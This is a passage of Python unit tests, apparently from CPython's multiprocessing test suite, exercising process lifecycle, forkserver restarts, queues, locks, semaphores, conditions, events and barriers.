with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, stream)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# Only the forkserver start method has a forkserver process that can die.
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platforms as it
# relies on sem_getvalue
pass
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=1.0))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
        # Removed temporarily: due to API shear this does not work with
        # threading._Event objects (is_set == isSet).
self.assertEqual(event.is_set(), False)
        # Removed: threading.Event.wait() returns the value of the internal
        # __flag instead of None (API shear with the semaphore-backed mp.Event).
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
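        # The counter is a single C int in shared memory so that child
        # processes see updates; the Lock serializes increments.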
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
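        # Join the worker processes when the Bunch is closed or
        # garbage-collected.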
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
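        # The waiter that draws index N//2 raises and aborts the barrier;
        # the other waiters then get BrokenBarrierError on their second wait().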
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
